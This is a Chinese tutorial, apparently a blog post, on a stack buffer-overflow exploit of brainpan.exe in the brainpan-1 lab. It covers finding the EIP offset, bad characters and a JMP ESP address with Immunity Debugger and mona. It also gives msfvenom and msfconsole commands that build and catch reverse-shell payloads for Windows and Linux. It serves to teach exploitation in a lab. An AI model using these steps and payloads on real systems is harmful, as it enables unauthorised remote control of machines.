【网络安全】brainpan-windows缓冲区溢出详解

简介

渗透测试
注意

本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。

一、前言

缓冲区溢出(buffer overflow),是针对程序设计缺陷,向程序输入缓冲区写入使之溢出的内容(通常是超过缓冲区能保存的最大数据量的数据),从而破坏程序运行、趁著中断之际并获取程序乃至系统的控制权。

项目十七:brainpan-1,专门考验缓冲区溢出知识,该项目仅仅开放了10000端口作为web端,经过简单的目录爆破就能发现存在brainpan.exe文件,该项目是乌班图环境并且安装了win的模块运行着exe文件,该文件启动了9999端口支撑服务,该环境就和AWD中的PWN题目一样,直播教学会有多种方法详细解释如何理解缓冲区溢出,如何发现缓冲区溢出,遇到缓冲区溢出如何利用,栈是什么等等问题详解。

接下来我分享其中方法一,欢迎大佬们指点。

测试是否存在缓冲区溢出:

python brainfuzzer.py 192.168.4.96 9999

image.png

【一>所有资源获取<一】
1、网络安全学习路线
2、电子书籍(白帽子)
3、安全大厂内部视频
4、100份src文档
5、常见安全面试题
6、ctf大赛经典题目解析
7、全套工具包
8、应急响应笔记

通过对程序发送1~1500位不等字符进行验证,提示程序崩溃,存在缓冲区溢出!

二、windows缓冲区溢出

1、windows 10打开Immunity Debugger

Immunity Debugger-漏洞分析专用调试器,没有的百度到处是下载地址!

Immunity Debugger 安装参考:

https://blog.csdn.net/clark3256453/article/details/121422527

开始利用操作:
然后点击:File-C:/....程序


image.png

运行出数据后的界面:


image.png

该界面是最初始的程序开启界面,需要点击右箭头图标才可运行程序:

image.png
image.png

开启完程序后,EAX值会清零,这时候本地程序会正常运行,并开启9999端口!

2、查询偏移量

1)利用pattern_create.rb生成1000位随机数值


image.png
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000

2)修改脚本brainpan1

image.png

3)发送1000位随机去覆盖程序


image.png
python brainpan1.py 10.211.55.44 9999

在kali执行对44的windows9999服务进行冲击。

image.png

可看到ESP已经被覆盖,得出EIP的值:35724134

4)EIP查看偏移量


image.png
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 35724134
[*] Exact match at offset 524

偏移量524!

5)解析下如何得到的

首先要知道内存地址和平常书写地址是相反的,内存会把内存低地址放在高位,内存高地址放在低位,所以排列顺序是:

35724134
34 41 72 35

对比ASCII表:


image.png
34 41 72 35
4  A  r  5
4Ar5

对照ASCII表信息是:4Ar#


image.png

所以对照的就是pattern_create.rb生成的1000字符中524位的地方存在溢出,pattern_offset.rb会自动计算在1000个字符中4Ar5位置在哪儿!

3、查看shellcode空间大小

思路:
将EIP修改为shellcode代码的内存地址,将shellcode写入到该地址空间,程序读取EIP寄存器数值,将跳转到shellcode代码段并执行,接下来将寻找可存放shellcode的内存空间是多少!

image.png

这里将放入472个字节C去测试!

image.png
python brainpan2.py 10.211.55.44 9999

image.png

EBP栈底指针已经被524个A覆盖,EIP已经指出四个B,ESP已经覆盖了472个C字节。

在ESP位置右键选择:Follow in Dump


image.png

在左下视图右键选择:Hex-Hex/ASCII(16 bytes)


image.png

选择十六个字节一行显示去观察!


image.png

可看到起始位:005ff910,结束位:005FFAE0


image.png

1D0是十六进制,转换十进制:


image.png

最少的shellcode需要300字节,现在寄存器的大小是464,足以存放一个shellcode!

4、查找坏字符

不同类型的程序、协议、漏洞,会将某些字符认为是坏字符,这些字符有固定用途:

1\. 返回地址、shellcode、buffer中都不能出现坏字符
2\. null byte (0x00)空字符,用于终止字符串的拷贝操作
3\. return (0x0D)回车操作,表示POP3 PASS命令输入完成

思路:
发送0x00--0xff 256个字符,查找所有坏字符
例如:计算机都用ASCII编码不同的编码都表示不同的字符,一个字符一个字节
00000000---11111111=256 有256种可能的字符情况

接下来查看坏字符,重新运行程序:brainpan2


image.png
image.png
python brainpan3.py 10.211.55.44 9999

image.png

或者是查看:右键选择Follow in Dump


image.png
image.png
image.png

可看到选择16字节显示后,最右边都是19F说明没有坏字符!

image.png

对比发现除了00外,其余都很正常!
接下来要找到跳转到ESP的指令指针寄存器的值!

5、漏洞利用开发

重定向数据流:

1\. 用ESP的地址替换EIP的值
2\. 但是ESP地址变化,硬编码不可行
3\. SLMail线程应用程序,操作系统为每个线程分配一段地址范围,每个线程地址范围不确定

变通思路:

1\. 在内存中寻找地址固定的系统模块
2\. 在模块中寻找JMP ESP指令的地址跳转,再由该指令间接跳转到ESP,从而执行shellcode
3\. mona.py脚本识别内存模块,搜索“return address”是JMP ESP指令的模块
4\. 寻找无DEP、ALSR保护的内存地址
5\. 内存地址不包含坏字符

image.png
!mona modules

SafeSEH、ASLR、NXCompat都是内存保护机制所保护的模块!
要选择JMP ESP一定要选择这三项都未False的,正好有一项符合!

image.png

现在进入该模块去查找有没有jmp esp的命令!
brainpan.exe
0BADF00D

查找JMP ESP:
利用nasm_shell.rb查看jmp esp的地址!

locate nasm_shell
/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
nasm > jmp esp
00000000  FFE4              jmp esp

可看到jmp esp地址:\xff\xe4

首先我们需要找到EIP offset,也就是正好覆盖到EIP的偏移量以便我们精准的覆盖EIP寄存器。所以我们要知道哪4个 a是放入到了EIP寄存器中,这就很复杂了,当然方法是有的,这里我们使用Immunity Debugger的插件mona,这样我们就避免了平常复杂的寻找方法。

安装mona:


image.png

将mona.py放在Immunity Debugger安装目录PyCommands下就行了!

image.png
!mona find -s "\xff\xe4" -m brainpan.exe

image.png
image.png

获得JMP ESP地址:0x311712f3

shellcode生成:


image.png
msfvenom -p windows/shell_reverse_tcp LPORT=443 LHOST=192.168.2.157 -e x86/shikata_ga_nai -b "\x00" -f py

生成shellcode后进行脚本编写!

brainpan4:

将shellcode防止对端!

windows10开启brainpan.exe:


image.png

kali运行脚本:


image.png

成功缓冲区溢出,获得反弹shell:


image.png

这时候要反弹linux的shellcode:brainpan5

msfvenom -p linux/x86/shell_reverse_tcp LPORT=443 LHOST=192.168.2.157 -e x86/shikata_ga_nai -b "\x00" -f py

然后替换脚本shellcode:

替换后进行执行:

msfconsole
use exploit/multi/handler
set payload linux/x86/shell_reverse_tcp
set lport 443
set lhost 192.168.2.157
exploit -j

MSF成功获得反弹shell!

三、总结

今天学到windows缓冲区溢出中windows 10使用Immunity Debugger逆向分析工具,熟悉栈如何查找栈空间,如何查看坏字符,如何编写EXP利用等等操作,最后远程代码执行控制服务器等操作,学到了非常多的小技巧和干货,希望小伙伴能实际操作复现一遍!来巩固告知企业单位的漏洞情况,并尽快进行加固巩固安全!

希望大家提高安全意识,没有网络安全就没有国家安全!

今天基础牢固就到这里,虽然基础,但是必须牢记于心。

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 203,271评论 5 476
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 85,275评论 2 380
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 150,151评论 0 336
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 54,550评论 1 273
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 63,553评论 5 365
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,559评论 1 281
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,924评论 3 395
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,580评论 0 257
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,826评论 1 297
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,578评论 2 320
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,661评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,363评论 4 318
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,940评论 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,926评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 31,156评论 1 259
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,872评论 2 349
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 42,391评论 2 342

推荐阅读更多精彩内容